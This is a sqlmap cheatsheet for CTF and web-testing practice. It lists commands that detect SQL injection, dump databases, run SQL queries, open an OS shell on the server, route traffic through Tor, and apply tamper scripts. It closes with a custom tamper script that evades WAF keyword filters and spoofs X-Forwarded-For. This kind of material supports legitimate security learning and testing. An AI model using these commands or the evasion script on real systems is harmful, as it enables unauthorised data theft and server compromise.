sqlmap is a good tool, and this page is a cheatsheet for using it in CTFs and OWSP.

Basic

If nothing is known about the target yet, start with a broad command to see whether sqlmap finds anything worth looking at.

sqlmap -u "https://target_site.com/page/" --proxy="http://127.0.0.1:8080/" --cookie="SESSID=lred0jr6na1vmci;" --data="p1=value1" -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl

What the flags do: --proxy routes every request through Burp so you can see exactly what sqlmap sent; --cookie takes name=value pairs (the cookie name is required, not just the value); --data makes it a POST and -p p1 limits testing to that one parameter. --level=5 enables every test, including injection into the Cookie, User-Agent, Referer and Host headers. --risk=3 adds OR-based boolean payloads, which can modify data if the injection lands inside an UPDATE or DELETE, so keep the default risk outside a CTF. --dbms=mysql skips fingerprinting of other backends. --technique=BEUSTQ (Boolean, Error, Union, Stacked, Time, inline Query) is already the default; the flag is only useful to restrict testing to a subset, e.g. --technique=BU. --force-ssl is redundant with an https:// URL.

Test all GET parameters automatically

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2"

Specify the GET parameter to exploit

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2" -p p1

Use POST requests (test all parameters)

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2"

SQLMap request file as input (-r)

sqlmap -r request.txt

request.txt is a raw HTTP request, e.g. saved from Burp's Repeater or Proxy history with "Copy to file". sqlmap takes the method, path, headers, cookies and body from it, so authenticated sessions and custom headers come along for free. To point sqlmap at a specific injection point inside the request, append a * after the value to test.

Use Authenticated Session with Cookies

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --cookie="SESSID=session_cookie_value"

Pass the full name=value pair; separate several cookies with ";".

Use Authenticated Session with Auth Headers

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

--headers takes several headers separated by newlines; for a single extra header -H "Name: value" does the same.

Basic Authentication

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

--auth-type also accepts digest and ntlm.

Use a previously created session file as input (-s)

sqlmap -u "https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

sqlmap records detected injections and dumped data in a session.sqlite under its output directory and resumes from it automatically; -s points it at a specific session file, so a confirmed injection does not have to be re-detected before post-exploitation.

Post Exploitation Commands

List the Databases

sqlmap -u "https://target_site.com/page?p1=value1" --dbs

List Tables of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --columns

Dump columns Col1 and Col2 of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --dump

Custom SQL query

sqlmap -u "https://target_site.com/page?p1=value1" --sql-query="SELECT Col1,Col2 FROM TARGET_DB.TARGET_TABLE"

The query must select from a table, not a database (SELECT * FROM TARGET_DB is not valid SQL). For an interactive prompt use --sql-shell instead.

Get OS Shell

sqlmap -u "https://target_site.com/page?p1=value1" --os-shell

This only works with enough privileges on the backend. On MySQL sqlmap needs either stacked queries (to inject a sys_exec UDF) or the FILE privilege plus a writable, web-reachable directory (to upload a web shell stager); it prompts for the web language and document root. On MSSQL it relies on xp_cmdshell. For a single command instead of a shell use --os-cmd="id".

SQLMap Proxy

Proxy through Burpsuite

sqlmap -u "https://target_site.com/page?p1=value1" --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

sqlmap -u "https://target_site.com/page?p1=value1" --tor --tor-type=SOCKS5 --check-tor --dbs

--tor uses the default Tor SOCKS port 9050 (override with --tor-port); --check-tor verifies that traffic really leaves through Tor before any test request is sent.

Tamper Scripts

Tamper scripts rewrite each payload before it is sent, to bypass a WAF or input filter or simply to change the encoding. Several scripts can be applied at once by giving --tamper a comma-separated list; sqlmap orders them by each script's __priority__, not by the order on the command line. A custom script can be supplied by its full path.

sqlmap -u "https://target_site.com/page?p1=value1" --tamper=charencode

sqlmap -u "https://target_site.com/page?p1=value1" --tamper=space2comment,charencode
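As an added example (not one of sqlmap's bundled tamper scripts, nor code from this page), here is a minimal custom tamper script showing the interface sqlmap expects: a module-level __priority__, an optional dependencies() hook, and a tamper(payload, **kwargs) function that returns the rewritten payload and may edit the request headers passed in kwargs. The transformations it applies (alternating keyword case, spaces replaced by /**/ inline comments, a spoofed X-Forwarded-For of 127.0.0.1) are assumptions chosen for a case-sensitive, localhost-trusting filter; adapt them to whatever the target actually blocks.

```python
# mytamper.py -- custom sqlmap tamper script (added example, not shipped with sqlmap).
# Usage: sqlmap -u "https://target_site.com/page?p1=value1" --tamper=/full/path/mytamper.py
import re

try:
    # Available when sqlmap imports the script; the fallback lets it run standalone.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.LOW
except ImportError:
    __priority__ = 0  # same value as PRIORITY.NORMAL

# Assumed filter: a case-sensitive keyword blocklist. sqlmap emits SQL keywords in
# uppercase, so the match is deliberately case-sensitive. ORDER is listed before OR
# so the alternation tries the longer keyword first.
KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "ORDER", "AND", "OR", "BY")
_KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b")

# Assumed for illustration: the filter trusts requests that claim to come from localhost.
SPOOFED_CLIENT_IP = "127.0.0.1"


def dependencies():
    """Called once by sqlmap at startup; bundled scripts use it to print a
    'works against X' hint. Nothing to check here."""
    pass


def alternate_case(word):
    """'SELECT' -> 'sElEcT': the database parses it identically, a case-sensitive
    signature does not match it."""
    return "".join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(word))


def tamper(payload, **kwargs):
    """
    sqlmap calls this for every payload before sending it. kwargs may carry
    'headers', the request header dict, which can be modified in place.
    """
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = SPOOFED_CLIENT_IP

    if not payload:
        return payload

    # 1. Alternate the case of known keywords.
    payload = _KEYWORD_RE.sub(lambda m: alternate_case(m.group(0)), payload)
    # 2. Replace every space with an inline comment; MySQL treats /**/ as whitespace.
    payload = payload.replace(" ", "/**/")
    return payload
```

With this script, the payload 1 AND 1=1 goes out as 1/**/aNd/**/1=1 and every request carries X-Forwarded-For: 127.0.0.1. Run sqlmap with -v 3 to see the tampered payloads it actually sends, and combine it with bundled scripts by listing both, e.g. --tamper=/full/path/mytamper.py,charencode.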